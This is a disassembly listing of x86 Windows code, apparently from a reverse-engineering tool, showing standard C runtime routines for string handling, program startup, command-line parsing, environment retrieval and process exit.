loc_4027DD: ; CODE XREF: sub_4027D0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40281F
test ecx, 3
jnz short loc_4027DD
loc_4027EC: ; CODE XREF: sub_4027D0+B�j
; sub_4027D0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4027EC
mov eax, [ecx-4]
test al, al
jz short loc_40282E
test ah, ah
jz short loc_402829
test eax, 0FF0000h
jz short loc_402824
test eax, 0FF000000h
jz short loc_40281F
jmp short loc_4027EC
; ---------------------------------------------------------------------------
loc_40281F: ; CODE XREF: sub_4027D0+12�j
; sub_4027D0+4B�j
lea edi, [ecx-1]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_402824: ; CODE XREF: sub_4027D0+44�j
lea edi, [ecx-2]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_402829: ; CODE XREF: sub_4027D0+3D�j
lea edi, [ecx-3]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_40282E: ; CODE XREF: sub_4027D0+39�j
lea edi, [ecx-4]
loc_402831: ; CODE XREF: sub_4027C0+5�j
; sub_4027D0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_402856
loc_40283D: ; CODE XREF: sub_4027D0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4028A8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40283D
jmp short loc_402856
; ---------------------------------------------------------------------------
loc_402851: ; CODE XREF: sub_4027D0+9E�j
; sub_4027D0+B8�j
mov [edi], edx
add edi, 4
loc_402856: ; CODE XREF: sub_4027D0+6B�j
; sub_4027D0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_402851
test dl, dl
jz short loc_4028A8
test dh, dh
jz short loc_40289F
test edx, 0FF0000h
jz short loc_402892
test edx, 0FF000000h
jz short loc_40288A
jmp short loc_402851
; ---------------------------------------------------------------------------
loc_40288A: ; CODE XREF: sub_4027D0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402892: ; CODE XREF: sub_4027D0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_40289F: ; CODE XREF: sub_4027D0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028A8: ; CODE XREF: sub_4027D0+72�j
; sub_4027D0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4027D0 endp
; =============== S U B R O U T I N E =======================================
sub_4028B0 proc near ; CODE XREF: sub_401E6E+19�p
arg_0 = dword ptr 4
cmp dword_406CFC, 1
jle short loc_4028CA
push 107h
push [esp+4+arg_0]
call sub_402AEC
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4028CA: ; CODE XREF: sub_4028B0+7�j
mov eax, [esp+arg_0]
mov ecx, off_406AF0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_4028B0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405140
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4050C4 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_406F74, edx
mov ecx, eax
and ecx, 0FFh
mov dword_406F70, ecx
shl ecx, 8
add ecx, edx
mov dword_406F6C, ecx
shr eax, 10h
mov dword_406F68, eax
xor esi, esi
push esi
call sub_403422
pop ecx
test eax, eax
jnz short loc_40294A
push 1Ch
call sub_4029F9
pop ecx
loc_40294A: ; CODE XREF: .text:00402940�j
mov [ebp-4], esi
call sub_403277
call dword_4050C0 ; GetCommandLineA
mov dword_407478, eax
call sub_403145
mov dword_406F50, eax
call sub_402EF8
call sub_402E3F
call sub_402B61
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4050BC ; GetStartupInfoA
call sub_402DE7
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_402997
movzx eax, word ptr [ebp-2Ch]
jmp short loc_40299A
; ---------------------------------------------------------------------------
loc_402997: ; CODE XREF: .text:0040298F�j
push 0Ah
pop eax
loc_40299A: ; CODE XREF: .text:00402995�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4050B8 ; GetModuleHandleA
push eax
call sub_4020C8
mov [ebp-60h], eax
push eax
call sub_402B8E
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402C63
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402B9F
; =============== S U B R O U T I N E =======================================
sub_4029D4 proc near ; CODE XREF: sub_402E3F+4E�p
; sub_402E3F+7D�p ...
arg_0 = dword ptr 4
cmp dword_406F58, 1
jnz short loc_4029E2
call sub_403630
loc_4029E2: ; CODE XREF: sub_4029D4+7�j
push [esp+arg_0]
call sub_403669
push 0FFh
call off_406AE0
pop ecx
pop ecx
retn
sub_4029D4 endp
; =============== S U B R O U T I N E =======================================
sub_4029F9 proc near ; CODE XREF: .text:00402944�p
arg_0 = dword ptr 4
cmp dword_406F58, 1
jnz short loc_402A07
call sub_403630
loc_402A07: ; CODE XREF: sub_4029F9+7�j
push [esp+arg_0]
call sub_403669
pop ecx
push 0FFh
call dword_4050C8 ; ExitProcess
retn
sub_4029F9 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402A36
loc_402A20: ; CODE XREF: sub_402A36+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402A36
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402A36 proc near ; CODE XREF: sub_4026A0+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402A20 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_402A5B
loc_402A48: ; CODE XREF: sub_402A36+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402A20
test cl, cl
jz short loc_402AA4
test edx, 3
jnz short loc_402A48
loc_402A5B: ; CODE XREF: sub_402A36+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_402A66: ; CODE XREF: sub_402A36+5B�j
; sub_402A36+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402AA8
and eax, 81010100h
jz short loc_402A66
and eax, 1010100h
jnz short loc_402AA2
and esi, 80000000h
jnz short loc_402A66
loc_402AA2: ; CODE XREF: sub_402A36+62�j
; sub_402A36+7B�j ...
pop esi
pop edi
loc_402AA4: ; CODE XREF: sub_402A36+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402AA8: ; CODE XREF: sub_402A36+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402AE5
test al, al
jz short loc_402AA2
cmp ah, bl
jz short loc_402ADE
test ah, ah
jz short loc_402AA2
shr eax, 10h
cmp al, bl
jz short loc_402AD7
test al, al
jz short loc_402AA2
cmp ah, bl
jz short loc_402AD0
test ah, ah
jz short loc_402AA2
jmp short loc_402A66
; ---------------------------------------------------------------------------
loc_402AD0: ; CODE XREF: sub_402A36+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: sub_402A36+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402A36+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402AE5: ; CODE XREF: sub_402A36+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402A36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEC proc near ; CODE XREF: sub_4028B0+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402B0A
mov ecx, off_406AF0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402B5C
; ---------------------------------------------------------------------------
loc_402B0A: ; CODE XREF: sub_402AEC+10�j
mov ecx, eax
push esi
mov esi, off_406AF0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402B2F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402B38
; ---------------------------------------------------------------------------
loc_402B2F: ; CODE XREF: sub_402AEC+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402B38: ; CODE XREF: sub_402AEC+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4037BC
add esp, 1Ch
test eax, eax
jnz short loc_402B58
leave
retn
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402AEC+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402B5C: ; CODE XREF: sub_402AEC+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402AEC endp
; =============== S U B R O U T I N E =======================================
sub_402B61 proc near ; CODE XREF: .text:00402971�p
mov eax, dword_407474
test eax, eax
jz short loc_402B6C
call eax ; dword_407474
loc_402B6C: ; CODE XREF: sub_402B61+7�j
push offset dword_406010
push offset dword_406008
call sub_402C49
push offset dword_406004
push offset dword_406000
call sub_402C49
add esp, 10h
retn
sub_402B61 endp
; =============== S U B R O U T I N E =======================================
sub_402B8E proc near ; CODE XREF: .text:004029B0�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402BB0
add esp, 0Ch
retn
sub_402B8E endp
; =============== S U B R O U T I N E =======================================
sub_402B9F proc near ; CODE XREF: .text:004029CF�p
; sub_4029D4+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402BB0
add esp, 0Ch
retn
sub_402B9F endp
; =============== S U B R O U T I N E =======================================
sub_402BB0 proc near ; CODE XREF: sub_402B8E+8�p
; sub_402B9F+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_406FA4, edi
jnz short loc_402BCD
push [esp+4+arg_0]
call dword_4050D0 ; GetCurrentProcess
push eax
call dword_4050CC ; TerminateProcess
loc_402BCD: ; CODE XREF: sub_402BB0+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_406FA0, edi
mov byte_406F9C, bl
jnz short loc_402C21
mov eax, dword_407470
test eax, eax
jz short loc_402C10
mov ecx, dword_40746C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402C0F
loc_402BFC: ; CODE XREF: sub_402BB0+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402C04
call eax
loc_402C04: ; CODE XREF: sub_402BB0+50�j
sub esi, 4
cmp esi, dword_407470
jnb short loc_402BFC
loc_402C0F: ; CODE XREF: sub_402BB0+4A�j
pop esi
loc_402C10: ; CODE XREF: sub_402BB0+3C�j
push offset dword_406018
push offset dword_406014
call sub_402C49
pop ecx
pop ecx
loc_402C21: ; CODE XREF: sub_402BB0+33�j
push offset dword_406020
push offset dword_40601C
call sub_402C49
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402C47
push [esp+4+arg_0]
mov dword_406FA4, edi
call dword_4050C8 ; ExitProcess
loc_402C47: ; CODE XREF: sub_402BB0+85�j
pop edi
retn
sub_402BB0 endp
; =============== S U B R O U T I N E =======================================
sub_402C49 proc near ; CODE XREF: sub_402B61+15�p
; sub_402B61+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402C4E: ; CODE XREF: sub_402C49+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402C61
mov eax, [esi]
test eax, eax
jz short loc_402C5C
call eax
loc_402C5C: ; CODE XREF: sub_402C49+F�j
add esi, 4
jmp short loc_402C4E
; ---------------------------------------------------------------------------
loc_402C61: ; CODE XREF: sub_402C49+9�j
pop esi
retn
sub_402C49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C63 proc near ; CODE XREF: .text:004029C1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402DA4
test eax, eax
pop ecx
jz loc_402D98
mov ebx, [eax+8]
test ebx, ebx
jz loc_402D98
cmp ebx, 5
jnz short loc_402C94
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402DA1
; ---------------------------------------------------------------------------
loc_402C94: ; CODE XREF: sub_402C63+23�j
cmp ebx, 1
jz loc_402D93
mov ecx, dword_406FA8
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_406FA8, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402D83
mov ecx, dword_406D80
mov edx, dword_406D84
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402CE3
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D10h[esi*4]
loc_402CDA: ; CODE XREF: sub_402C63+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402CDA
loc_402CE3: ; CODE XREF: sub_402C63+69�j
mov eax, [eax]
mov esi, dword_406D8C
cmp eax, 0C000008Eh
jnz short loc_402CFE
mov dword_406D8C, 83h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402CFE: ; CODE XREF: sub_402C63+8D�j
cmp eax, 0C0000090h
jnz short loc_402D11
mov dword_406D8C, 81h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D11: ; CODE XREF: sub_402C63+A0�j
cmp eax, 0C0000091h
jnz short loc_402D24
mov dword_406D8C, 84h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D24: ; CODE XREF: sub_402C63+B3�j
cmp eax, 0C0000093h
jnz short loc_402D37
mov dword_406D8C, 85h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402C63+C6�j
cmp eax, 0C000008Dh
jnz short loc_402D4A
mov dword_406D8C, 82h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D4A: ; CODE XREF: sub_402C63+D9�j
cmp eax, 0C000008Fh
jnz short loc_402D5D
mov dword_406D8C, 86h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D5D: ; CODE XREF: sub_402C63+EC�j
cmp eax, 0C0000092h
jnz short loc_402D6E
mov dword_406D8C, 8Ah
loc_402D6E: ; CODE XREF: sub_402C63+99�j
; sub_402C63+AC�j ...
push dword_406D8C
push 8
call ebx ; wsprintfA
pop ecx
mov dword_406D8C, esi
pop ecx
pop esi
jmp short loc_402D8B
; ---------------------------------------------------------------------------
loc_402D83: ; CODE XREF: sub_402C63+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; wsprintfA
pop ecx
loc_402D8B: ; CODE XREF: sub_402C63+11E�j
mov eax, [ebp+arg_0]
mov dword_406FA8, eax
loc_402D93: ; CODE XREF: sub_402C63+34�j
or eax, 0FFFFFFFFh
jmp short loc_402DA1
; ---------------------------------------------------------------------------
loc_402D98: ; CODE XREF: sub_402C63+F�j
; sub_402C63+1A�j
push [ebp+arg_4]
call dword_4050D4 ; UnhandledExceptionFilter
loc_402DA1: ; CODE XREF: sub_402C63+2C�j
; sub_402C63+133�j
pop ebx
pop ebp
retn
sub_402C63 endp
; =============== S U B R O U T I N E =======================================
sub_402DA4 proc near ; CODE XREF: sub_402C63+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406D88
cmp dword_406D08, edx
push esi
mov eax, offset dword_406D08
jz short loc_402DD1
lea esi, [ecx+ecx*2]
lea esi, ds:406D08h[esi*4]
loc_402DC6: ; CODE XREF: sub_402DA4+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402DD1
cmp [eax], edx
jnz short loc_402DC6
loc_402DD1: ; CODE XREF: sub_402DA4+16�j
; sub_402DA4+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406D08h[ecx*4]
cmp eax, ecx
jnb short loc_402DE4
cmp [eax], edx
jz short locret_402DE6
loc_402DE4: ; CODE XREF: sub_402DA4+3A�j
xor eax, eax
locret_402DE6: ; CODE XREF: sub_402DA4+3E�j
retn
sub_402DA4 endp
; =============== S U B R O U T I N E =======================================
sub_402DE7 proc near ; CODE XREF: .text:00402983�p
cmp dword_407468, 0
jnz short loc_402DF5
call sub_403D0B
loc_402DF5: ; CODE XREF: sub_402DE7+7�j
push esi
mov esi, dword_407478
mov al, [esi]
cmp al, 22h
jnz short loc_402E27
loc_402E02: ; CODE XREF: sub_402DE7+33�j
; sub_402DE7+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402E1F
test al, al
jz short loc_402E1F
movzx eax, al
push eax
call sub_403905
test eax, eax
pop ecx
jz short loc_402E02
inc esi
jmp short loc_402E02
; ---------------------------------------------------------------------------
loc_402E1F: ; CODE XREF: sub_402DE7+21�j
; sub_402DE7+25�j
cmp byte ptr [esi], 22h
jnz short loc_402E31
loc_402E24: ; CODE XREF: sub_402DE7+52�j
inc esi
jmp short loc_402E31
; ---------------------------------------------------------------------------
loc_402E27: ; CODE XREF: sub_402DE7+19�j
cmp al, 20h
jbe short loc_402E31
loc_402E2B: ; CODE XREF: sub_402DE7+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402E2B
loc_402E31: ; CODE XREF: sub_402DE7+3B�j
; sub_402DE7+3E�j ...
mov al, [esi]
test al, al
jz short loc_402E3B
cmp al, 20h
jbe short loc_402E24
loc_402E3B: ; CODE XREF: sub_402DE7+4E�j
mov eax, esi
pop esi
retn
sub_402DE7 endp
; =============== S U B R O U T I N E =======================================
sub_402E3F proc near ; CODE XREF: .text:0040296C�p
push ebx
xor ebx, ebx
cmp dword_407468, ebx
push esi
push edi
jnz short loc_402E51
call sub_403D0B
loc_402E51: ; CODE XREF: sub_402E3F+B�j
mov esi, dword_406F50
xor edi, edi
loc_402E59: ; CODE XREF: sub_402E3F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402E71
cmp al, 3Dh
jz short loc_402E64
inc edi
loc_402E64: ; CODE XREF: sub_402E3F+22�j
push esi
call sub_4022B0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402E59
; ---------------------------------------------------------------------------
loc_402E71: ; CODE XREF: sub_402E3F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403D56
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_406F84, esi
jnz short loc_402E93
push 9
call sub_4029D4
pop ecx
loc_402E93: ; CODE XREF: sub_402E3F+4A�j
mov edi, dword_406F50
cmp [edi], bl
jz short loc_402ED6
push ebp
loc_402E9E: ; CODE XREF: sub_402E3F+94�j
push edi
call sub_4022B0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402ECF
push ebp
call sub_403D56
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402EC2
push 9
call sub_4029D4
pop ecx
loc_402EC2: ; CODE XREF: sub_402E3F+79�j
push edi
push dword ptr [esi]
call sub_4027C0
pop ecx
add esi, 4
pop ecx
loc_402ECF: ; CODE XREF: sub_402E3F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402E9E
pop ebp
loc_402ED6: ; CODE XREF: sub_402E3F+5C�j
push dword_406F50
call sub_403D27
pop ecx
mov dword_406F50, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_407464, 1
pop ebx
retn
sub_402E3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF8 proc near ; CODE XREF: .text:00402967�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_407468, ebx
push esi
push edi
jnz short loc_402F0F
call sub_403D0B
loc_402F0F: ; CODE XREF: sub_402EF8+10�j
mov esi, offset dword_406FAC
push 104h
push esi
push ebx
call dword_405034 ; GetModuleFileNameA
mov eax, dword_407478
mov dword_406F94, esi
mov edi, esi
cmp [eax], bl
jz short loc_402F34
mov edi, eax
loc_402F34: ; CODE XREF: sub_402EF8+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402F91
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403D56
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402F64
push 8
call sub_4029D4
pop ecx
loc_402F64: ; CODE XREF: sub_402EF8+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402F91
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_406F7C, esi
pop edi
pop esi
mov dword_406F78, eax
pop ebx
leave
retn
sub_402EF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F91 proc near ; CODE XREF: sub_402EF8+47�p
; sub_402EF8+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402FBB
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FBB: ; CODE XREF: sub_402F91+20�j
cmp byte ptr [eax], 22h
jnz short loc_403004
loc_402FC0: ; CODE XREF: sub_402F91+58�j
; sub_402F91+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402FF2
test dl, dl
jz short loc_402FF2
movzx edx, dl
test byte_407241[edx], 4
jz short loc_402FE5
inc dword ptr [ecx]
test esi, esi
jz short loc_402FE5
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402FE5: ; CODE XREF: sub_402F91+46�j
; sub_402F91+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402FC0
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402FC0
; ---------------------------------------------------------------------------
loc_402FF2: ; CODE XREF: sub_402F91+36�j
; sub_402F91+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402FFC
and byte ptr [esi], 0
inc esi
loc_402FFC: ; CODE XREF: sub_402F91+65�j
cmp byte ptr [eax], 22h
jnz short loc_403047
inc eax
jmp short loc_403047
; ---------------------------------------------------------------------------
loc_403004: ; CODE XREF: sub_402F91+2D�j
; sub_402F91+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40300F
mov dl, [eax]
mov [esi], dl
inc esi
loc_40300F: ; CODE XREF: sub_402F91+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_407241[ebx], 4
jz short loc_40302A
inc dword ptr [ecx]
test esi, esi
jz short loc_403029
mov bl, [eax]
mov [esi], bl
inc esi
loc_403029: ; CODE XREF: sub_402F91+91�j
inc eax
loc_40302A: ; CODE XREF: sub_402F91+8B�j
cmp dl, 20h
jz short loc_403038
test dl, dl
jz short loc_40303C
cmp dl, 9
jnz short loc_403004
loc_403038: ; CODE XREF: sub_402F91+9C�j
test dl, dl
jnz short loc_40303F
loc_40303C: ; CODE XREF: sub_402F91+A0�j
dec eax
jmp short loc_403047
; ---------------------------------------------------------------------------
loc_40303F: ; CODE XREF: sub_402F91+A9�j
test esi, esi
jz short loc_403047
and byte ptr [esi-1], 0
loc_403047: ; CODE XREF: sub_402F91+6E�j
; sub_402F91+71�j ...
and [ebp+arg_10], 0
loc_40304B: ; CODE XREF: sub_402F91+19E�j
cmp byte ptr [eax], 0
jz loc_403134
loc_403054: ; CODE XREF: sub_402F91+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_403060
cmp dl, 9
jnz short loc_403063
loc_403060: ; CODE XREF: sub_402F91+C8�j
inc eax
jmp short loc_403054
; ---------------------------------------------------------------------------
loc_403063: ; CODE XREF: sub_402F91+CD�j
cmp byte ptr [eax], 0
jz loc_403134
test edi, edi
jz short loc_403078
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_403078: ; CODE XREF: sub_402F91+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_40307D: ; CODE XREF: sub_402F91+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_403086: ; CODE XREF: sub_402F91+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_40308F
inc eax
inc ebx
jmp short loc_403086
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_402F91+F8�j
cmp byte ptr [eax], 22h
jnz short loc_4030C0
test bl, 1
jnz short loc_4030BE
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4030AD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4030AD
mov eax, edx
jmp short loc_4030B0
; ---------------------------------------------------------------------------
loc_4030AD: ; CODE XREF: sub_402F91+10D�j
; sub_402F91+116�j
mov [ebp+arg_0], edi
loc_4030B0: ; CODE XREF: sub_402F91+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_4030BE: ; CODE XREF: sub_402F91+106�j
shr ebx, 1
loc_4030C0: ; CODE XREF: sub_402F91+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_4030D5
inc ebx
loc_4030C8: ; CODE XREF: sub_402F91+142�j
test esi, esi
jz short loc_4030D0
mov byte ptr [esi], 5Ch
inc esi
loc_4030D0: ; CODE XREF: sub_402F91+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_4030C8
loc_4030D5: ; CODE XREF: sub_402F91+134�j
mov dl, [eax]
test dl, dl
jz short loc_403125
cmp [ebp+arg_10], 0
jnz short loc_4030EB
cmp dl, 20h
jz short loc_403125
cmp dl, 9
jz short loc_403125
loc_4030EB: ; CODE XREF: sub_402F91+14E�j
cmp [ebp+arg_0], 0
jz short loc_40311F
test esi, esi
jz short loc_40310E
movzx ebx, dl
test byte_407241[ebx], 4
jz short loc_403107
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403107: ; CODE XREF: sub_402F91+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40311D
; ---------------------------------------------------------------------------
loc_40310E: ; CODE XREF: sub_402F91+162�j
movzx edx, dl
test byte_407241[edx], 4
jz short loc_40311D
inc eax
inc dword ptr [ecx]
loc_40311D: ; CODE XREF: sub_402F91+17B�j
; sub_402F91+187�j
inc dword ptr [ecx]
loc_40311F: ; CODE XREF: sub_402F91+15E�j
inc eax
jmp loc_40307D
; ---------------------------------------------------------------------------
loc_403125: ; CODE XREF: sub_402F91+148�j
; sub_402F91+153�j ...
test esi, esi
jz short loc_40312D
and byte ptr [esi], 0
inc esi
loc_40312D: ; CODE XREF: sub_402F91+196�j
inc dword ptr [ecx]
jmp loc_40304B
; ---------------------------------------------------------------------------
loc_403134: ; CODE XREF: sub_402F91+BD�j
; sub_402F91+D5�j
test edi, edi
jz short loc_40313B
and dword ptr [edi], 0
loc_40313B: ; CODE XREF: sub_402F91+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402F91 endp
; =============== S U B R O U T I N E =======================================
sub_403145 proc near ; CODE XREF: .text:0040295D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4070B0
push ebx
push ebp
mov ebp, dword_4050A8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_403193
call ebp ; dword_4050A8
mov esi, eax
cmp esi, ebx
jz short loc_403174
mov dword_4070B0, 1
jmp short loc_40319C
; ---------------------------------------------------------------------------
loc_403174: ; CODE XREF: sub_403145+21�j
call dword_4050AC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_40326E
mov dword_4070B0, 2
jmp loc_403222
; ---------------------------------------------------------------------------
loc_403193: ; CODE XREF: sub_403145+19�j
cmp eax, 1
jnz loc_40321D
loc_40319C: ; CODE XREF: sub_403145+2D�j
cmp esi, ebx
jnz short loc_4031AC
call ebp ; dword_4050A8
mov esi, eax
cmp esi, ebx
jz loc_40326E
loc_4031AC: ; CODE XREF: sub_403145+59�j
cmp [esi], bx
mov eax, esi
jz short loc_4031C1
